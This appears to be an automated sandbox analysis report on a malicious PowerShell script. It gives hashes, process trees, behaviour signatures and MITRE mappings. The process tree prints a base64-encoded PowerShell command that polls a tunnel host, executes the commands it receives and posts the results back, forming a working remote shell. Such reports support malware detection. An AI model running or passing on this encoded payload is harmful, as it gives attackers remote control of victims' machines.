cd5836660781327546b4f84e4988a9eacd612191826ed776b394e2215efe804b

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2024 21:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ChangeThis.ps1
Size

1KB
MD5

41edd0f62b0c996b8330f1d59b59dcad
SHA1

b8a54269a5c4f526b710c5b1f32d9830ba3e6b74
SHA256

cd5836660781327546b4f84e4988a9eacd612191826ed776b394e2215efe804b
SHA512

f36b123f529f57ccfd580a0ae923d709916c5632844fc2ebb67e62d2b4a70987844e8d7240ee09b2f4a1fbfce5453bba549c457f163f37d4c4a71dfb0a9a9114

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	2344	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4808	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4808	powershell.exe
4808	powershell.exe
2344	powershell.exe
2344	powershell.exe
4492	msedge.exe
4492	msedge.exe
6004	msedge.exe
6004	msedge.exe
5960	msedge.exe
5960	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4808 wrote to memory of 2344	4808	powershell.exe	83
PID 4808 wrote to memory of 2344	4808	powershell.exe	83
PID 3224 wrote to memory of 4360	3224	msedge.exe	111
PID 3224 wrote to memory of 4360	3224	msedge.exe	111
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4528	3224	msedge.exe	112
PID 3224 wrote to memory of 4492	3224	msedge.exe	113
PID 3224 wrote to memory of 4492	3224	msedge.exe	113
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114
PID 3224 wrote to memory of 4076	3224	msedge.exe	114

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ChangeThis.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAA2AGYAPQAnAHcAaQBjAGsAZQBkAC0AcABsAGEAYwBlAHMALQBjAG8AdQBnAGgALgBsAG8AYwBhAC4AbAB0ACcAOwAkADMAMgA2AD0AJwA4AGMAYwA4ADAAZABkADQALQA0ADQANAA1ADkAYgAxADQALQA0ADkAMQAyADIAOQA3AGYAJwA7ACQAYgA3ADYAZgAyAD0AJwBoAHQAdABwAHMAOgAvAC8AJwA7ACQAMgBlADMAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAYgA3ADYAZgAyACQANgBmAC8AOABjAGMAOAAwAGQAZAA0ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtAGEAZgBjADEALQAwAGEAYwBiACIAPQAkADMAMgA2ADsAIgBCAHkAcABhAHMAcwAtAFQAdQBuAG4AZQBsAC0AUgBlAG0AaQBuAGQAZQByACIAPQAkADMAMgA2AH0AOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAJABjAD0AKABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAYgA3ADYAZgAyACQANgBmAC8ANAA0ADQANQA5AGIAMQA0ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtAGEAZgBjADEALQAwAGEAYwBiACIAPQAkADMAMgA2ADsAIgBCAHkAcABhAHMAcwAtAFQAdQBuAG4AZQBsAC0AUgBlAG0AaQBuAGQAZQByACIAPQAkADMAMgA2AH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBOAG8AbgBlACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAYgA3ADYAZgAyACQANgBmAC8ANAA5ADEAMgAyADkANwBmACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AYQBmAGMAMQAtADAAYQBjAGIAIgA9ACQAMwAyADYAOwAiAEIAeQBwAGEAcwBzAC0AVAB1AG4AbgBlAGwALQBSAGUAbQBpAG4AZABlAHIAIgA9ACQAMwAyADYAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault32bba495h53b6h4dc9h932dhebf2d3b84371
1⤵
- Suspicious use of WriteProcessMemory
PID:3224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9603746f8,0x7ff960374708,0x7ff960374718
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8499470426422800100,2583735912895013474,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8499470426422800100,2583735912895013474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8499470426422800100,2583735912895013474,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
  2⤵
  PID:4076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5252

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5340

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault4f4bb41ahbd89h4d0bh8fabh6cb40a6fd5b9
1⤵
PID:5708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9603746f8,0x7ff960374708,0x7ff960374718
  2⤵
  PID:5720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,4288358020383653536,3708173527930950664,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
  2⤵
  PID:5992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,4288358020383653536,3708173527930950664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,4288358020383653536,3708173527930950664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
  2⤵
  PID:6024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault926b3beeh69e4h4132h93cfh02eed7d5913a
1⤵
PID:1892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9603746f8,0x7ff960374708,0x7ff960374718
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,10279720571483135477,847928253734768157,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
  2⤵
  PID:5988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,10279720571483135477,847928253734768157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,10279720571483135477,847928253734768157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2312 /prefetch:8
  2⤵
  PID:5328

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b6f2d6d5d0c12549c78194121f15eb20

SHA1
d37c414763dc76682c4616516c97255e388f1113

SHA256
8066487482f1ed2da5c8c199f4fdaa5a7c40de780f72843cedf2745055c22023

SHA512
dae8ff30a7273adb6d0ee1cb008dac54ddf2099d65df241a546868ebe28859a7b62f4b1349620eda8338361b4acc197dd9aed7ee0142a50359083c25f0069afc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56067634f68231081c4bd5bdbfcc202f

SHA1
5582776da6ffc75bb0973840fc3d15598bc09eb1

SHA256
8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4

SHA512
c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
81e892ca5c5683efdf9135fe0f2adb15

SHA1
39159b30226d98a465ece1da28dc87088b20ecad

SHA256
830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17

SHA512
c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c893366-0051-48ed-b60e-43e854fc2053.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
334B

MD5
3d21930e842561a84dfe036cc9943809

SHA1
42c4296353340eb53da6c1ab86fc23d25d66c3d5

SHA256
1fb304d56fc875106c5a790811d6e3afc1c97184aabcf2488b7cdb73718d753e

SHA512
533a94624132def746db9da8359da86ad1dc16445714fa55c807e37fe10a42ba2055499d8d596112389e66e72d19dcf611047a46e1114ca60bbf8e462d9287b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
61B

MD5
4df4574bfbb7e0b0bc56c2c9b12b6c47

SHA1
81efcbd3e3da8221444a21f45305af6fa4b71907

SHA256
e1b77550222c2451772c958e44026abe518a2c8766862f331765788ddd196377

SHA512
78b14f60f2d80400fe50360cf303a961685396b7697775d078825a29b717081442d357c2039ad0984d4b622976b0314ede8f478cde320daec118da546cb0682a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
185f4b69f0216eb12ac87d999544423d

SHA1
d9f04674145feee0323cb7742293f27a756fb4a6

SHA256
81e71e55084bca9f745db64794c6bfbf77b2b73f1786e1b0d7178cd65dc87246

SHA512
1ca22ce827278486faa482dd1e32fe4efe92a530187ab694bf57fa120b1c461d28b28c9d64ec9dbe97fa5066365e832fcb89a36672f6c952e68afcf0e27fcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5657693d9a6df47a52cef858ed14adf0

SHA1
f3b3da989c89c84f970b294ed5fa0f7e83b6eadc

SHA256
d533c8afcfa460e4c9471f13f4e8ad6c6ff649579ba82dbc5f4138d67dfe370b

SHA512
0af5ef8bf499dfeba269d1cf8f70150cf6644ed328e6b2bfd5eec085c109c671617fdd9736f19edf73f65628647d33a9dce1cf25999bcc1f3a7911b9142035b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
49b2061c1986f896f9190808f2b8cc75

SHA1
eac4c1263b0e56031d3d3e85fcf8d59c010a8387

SHA256
0df81f91e98eafe502dc6cd3e0892e2e8ae8b9d9c713ea529eea2da5144b71b3

SHA512
f7bf38456cb74bf07a6106f06e2d85f2d97765e79f5b38ec9cd296bae11f9631c0df11891e0e974dee3548294f412f8c8fad13700f9b41135350debded224ec7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
350B

MD5
7cc3a15bbeacd28cc33f39627fc6bbc8

SHA1
2a2a0ceb93aa5e56295d9c6e9ef4a915effea82a

SHA256
a717e7ce4a4582c3c44001a5e98d9b45afa708b8473ad387e81a2251db9f4201

SHA512
07bd75ce219ee539d9153a3c0ac358f1845879b36e100d5590e69c133ffba81c1e887c93e08496d2066d57b98dc493513bd91f5e12a4ceb3473ce174879fa636

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
df7ce3758b0d597d272555e11b3fb86e

SHA1
758f37f3cfd799f096012dc68966cce53648d6d6

SHA256
08daa5248fce75a85faa8946edb67d0469a181aab03fe1da4ef76749d1757431

SHA512
2a98d69f71b3c38cd89ad1973eec6a7a7f30f895544cfb184cc2e6d0b8e4a3b61075726805c60827e7f0e8b3b9b5a61a32a4b76206730ae136b9521a7fa97ef8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
326B

MD5
38f4270f7bb543972cb11e52a8bf38c4

SHA1
91be868276c711603d189e0787453baf82f8ac83

SHA256
e8e334a5d37b4c28b092ee03e4abb1566c10c6eba480447b11f239440e40336e

SHA512
b08965017a936437fd3a40644b86a38f0b8082757eb5ed7bd0c56e281b3bc55faaae08378134b75e432d53d2ce2f48783135e0f4c0c89d714007f60200f1446f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
0e423f40061ed722e6d77e3fba8fffdf

SHA1
aa99edd820a82dfe090b4ee583554fec97bf07a7

SHA256
562253671dc2036f3da4f9a5e7680b57c6f7444096b410660ff71e9af7ba6470

SHA512
cbaf805660c1e4dd21ea87f9e23cf866e8e2d1aaace921367862870e9b13ecee60a6331b5cbf58bb51228330b2fbf4ff381bf5d5dca6a6aabcf41bd3ab5a664a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
0f4e1336077bd373e6ffef536b9ab7cd

SHA1
bbf641a6eb66640bed83038d1889b49078912bc5

SHA256
08c839bd4e20ea7b432d4d0275721f0ae673c6c514138946ff38b16f13ba10d5

SHA512
7b7904ba29d60f0b92c8e0c822cbaf322021eab79c2112c6fc5c68c78fc490393074a3100f468f9b1ca367c1d2f7791871500cd7ca3326bff4c97fe85d407b80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
f635ff85489c6a33ce5fec6d950b7de1

SHA1
2248fc36e2205873fe8eb0770760c5a9e818ef68

SHA256
86fe05491a248fe13867acd2679e919e148b936c7774e240191438031963d3d3

SHA512
e392d2de377a9a1cec64d8b83183189612609af42b214f741807ce85f68e225fd4a1e10579bf782d2ddb7430e01b0e3a2d69c7934ef34aba1f55cdd90230c923

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vz2dzecf.gkk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2344-25-0x000001DDB27D0000-0x000001DDB2F76000-memory.dmp

Filesize
7.6MB

Download
memory/2344-22-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/2344-21-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/2344-23-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/2344-199-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/2344-28-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/4808-24-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/4808-6-0x00000253ED700000-0x00000253ED722000-memory.dmp

Filesize
136KB

Download
memory/4808-20-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/4808-0-0x00007FF96FDE3000-0x00007FF96FDE5000-memory.dmp

Filesize
8KB

Download
memory/4808-27-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download
memory/4808-203-0x00007FF96FDE0000-0x00007FF9708A1000-memory.dmp

Filesize
10.8MB

Download